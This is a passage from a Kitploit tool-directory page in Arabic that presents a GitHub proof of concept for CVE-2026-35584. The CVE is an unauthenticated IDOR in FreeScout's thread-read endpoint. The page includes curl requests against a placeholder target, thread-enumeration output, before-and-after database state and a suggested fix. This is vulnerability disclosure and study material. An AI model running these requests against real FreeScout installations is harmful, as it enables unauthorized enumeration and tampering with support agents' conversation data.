Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-35584 — إثبات مفهوم لاستغلال ثغرة IDOR غير مصادق عليها في FreeScout تتيح تعداد الخيوط والتلاعب بحالة القراءة عبر طلبات HTTP مصممة بعناية. | Kitploit
أدوات/GitHubGitHub/spoo1k/cve-2026-35584
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتأمن الويباختبار الاختراق
GitHubspoo1k/cve-2026-35584

CVE-2026-35584

إثبات مفهوم لاستغلال ثغرة IDOR غير مصادق عليها في FreeScout تتيح تعداد الخيوط والتلاعب بحالة القراءة عبر طلبات HTTP مصممة بعناية.

عرض المستودع
منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-35584

POC - CVE-2026-35584 FreeScout

الوصف

ملخص

لا يتطلب نقطة النهاية GET /thread/read/{conversation_id}/{thread_id} مصادقة ولا يتحقق مما إذا كان thread_id المعطى ينتمي إلى conversation_id المعطى. وهذا يسمح لأي مهاجم غير مصادق بما يلي:

تحديد أي thread كمقروء عن طريق تمرير معرّفات عشوائية تعداد معرّفات thread الصالحة عبر رموز استجابة HTTP (200 مقابل 404) التلاعب بطوابع opened_at عبر المحادثات (IDOR)

root@kitploit:~
الإصدار المتأثر
1.8.211 (الأحدث)

خطوات إعادة الإنتاج

إنشاء محادثتين (conv_id=1 و conv_id=2) إنشاء thread في المحادثة 2 (thread_id=3) بدون أي مصادقة، أرسل: GET /thread/read/1/3 تحقق في قاعدة البيانات — تم الآن تعيين opened_at للـ thread_id=3، على الرغم من الوصول إليه عبر conversation_id خاطئ

PoC

root@kitploit:~
curl -v "http://TARGET/thread/read/1/3"

يُرجع HTTP 200 ويقوم بتعيين opened_at على thread 3

التأثير

لا يتطلب مصادقة IDOR: لا يتم التحقق من thread_id مقابل conversation_id تعداد الـ threads: HTTP 200 = thread صالح، 404 = غير صالح التلاعب بمقاييس القراءة/عدم القراءة المستخدمة من قبل وكلاء الدعم يكسر نموذج عزل المحادثات

الإصلاح المقترح

root@kitploit:~
if ($thread->conversation_id !== (int)$conversation_id) {
abort(403);
}

مخرجات PoC

تعداد الـ threads (بدون مصادقة)

root@kitploit:~
curl -v "http://TARGET/thread/read/1/1" → HTTP 200 (thread صالح)
root@kitploit:~
curl -v "http://TARGET/thread/read/1/2" → HTTP 200 (thread صالح)
root@kitploit:~
curl -v "http://TARGET/thread/read/1/3" → HTTP 200 (IDOR - thread ينتمي إلى المحادثة 2)
root@kitploit:~
curl -v "http://TARGET/thread/read/1/4" → HTTP 404 (thread غير صالح)

حالة قاعدة البيانات بعد الاستغلال

قبل: | id | conversation_id | opened_at | | 3 | 2 | NULL |

بعد GET /thread/read/1/3 (بدون مصادقة): | id | conversation_id | opened_at | | 3 | 2 | 2026-04-03 23:19:46 |

تنزيل الأداة